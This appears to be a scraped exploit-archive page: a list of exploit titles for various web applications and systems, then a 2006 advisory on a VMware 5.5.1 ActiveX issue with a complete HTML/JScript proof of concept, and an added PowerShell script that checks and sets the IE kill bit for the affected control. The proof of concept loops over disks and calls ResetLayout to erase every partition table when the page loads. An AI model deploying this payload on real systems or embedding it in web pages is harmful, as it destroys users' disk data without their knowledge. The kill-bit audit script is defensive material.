
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
65 lines
1.6 KiB
HTML
Executable file
<!--
[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue.

Advisory ID:
XSec-06-05

Advisory Name:
VMware 5.5.1 for Windows arbitrary partition table delete issue.

Release Date:
08/16/2006

Tested on:
VMware 5.5.1 build-19175 on Windows Server 2000/2003

Affected version:
VMware 5.5.1

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
On a running Windows system, you can't delete, format or change the system drive.
VMware registers a COM object used for virtual disks, but it is very dangerous.
I don't know how to name this issue. If you allow unsafe ActiveX and JScript
and have VMware installed, vmware.htm will delete all hard disk partition
tables on the Windows system. Please back up your partition table first.

Exploit:

=============== vmware.htm start ================

// VMware 5.5.1 for Windows arbitrary partition table delete issue.
// Tested on Windows Server 2000/2003
//
// nop nop#xsec.org
// http://www.xsec.org
//

// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}
// Info: Vie2Locator Class
// ProgID: VieLib2.Vie2Locator.1
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual Image Editing\vielib.dll

-->
<html><body>
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}" id="vmware"> </object>
<script>
var disk = 0; // HardDisk No
while (disk < 20)
{
var x = vmware.ConnectDisk(disk); // Connect to HardDisk
x.ResetLayout(); // Will clean all partition table on your Harddisk
disk += 1;
}
</script>
</body></html>
# milw0rm.com [2006-08-16]
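
Added defensive example, not part of the advisory or of VMware's code: a PowerShell script that reports whether the Vie2Locator CLSID named in the advisory is registered as a COM server and whether Internet Explorer's ActiveX kill bit is set for it, and that can set the bit. The registry locations are the standard COM and IE "ActiveX Compatibility" keys; the function names `Get-KillBitStatus` and `Set-KillBit` are hypothetical.

```powershell
# Added example: audit and set the IE ActiveX kill bit for the CLSID in the advisory.
$Clsid   = '{0F748FDE-0597-443C-8596-71854C5EA20A}'   # Vie2Locator Class, from the advisory
$KillBit = 0x400                                       # kill-bit value in "Compatibility Flags"

# Native registry view and the 32-bit view on 64-bit Windows.
$Views = @(
    @{ Com = 'HKLM:\SOFTWARE\Classes\CLSID'
       Ie  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Com = 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'
       Ie  = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

function Get-KillBitStatus {
    foreach ($v in $Views) {
        $server = Join-Path $v.Com "$Clsid\InprocServer32"
        $ieKey  = Join-Path $v.Ie  $Clsid
        # Default value of InprocServer32 is the DLL path; absent key means not registered.
        $dll    = if (Test-Path $server) { (Get-Item $server).GetValue('') } else { $null }
        $flags  = if (Test-Path $ieKey) { (Get-Item $ieKey).GetValue('Compatibility Flags', 0) } else { 0 }
        [pscustomobject]@{
            View       = $v.Ie
            Registered = [bool]$dll
            Server     = $dll
            Flags      = '0x{0:X8}' -f $flags
            KillBitSet = (($flags -band $KillBit) -ne 0)
        }
    }
}

function Set-KillBit {
    foreach ($v in $Views) {
        if (-not (Test-Path $v.Ie)) { continue }        # view absent (for example a 32-bit OS)
        $ieKey = Join-Path $v.Ie $Clsid
        if (-not (Test-Path $ieKey)) { New-Item -Path $ieKey -Force | Out-Null }
        $old = (Get-Item $ieKey).GetValue('Compatibility Flags', 0)
        # OR the bit in so any existing compatibility flags are preserved.
        Set-ItemProperty -Path $ieKey -Name 'Compatibility Flags' -Value ($old -bor $KillBit) -Type DWord
    }
}

Get-KillBitStatus | Format-Table -AutoSize
# Set-KillBit      # run elevated, then re-run Get-KillBitStatus to confirm
```

A host where `Registered` is true and `KillBitSet` is false can still instantiate the control from script when the user allows unsafe ActiveX, which is the condition the advisory describes.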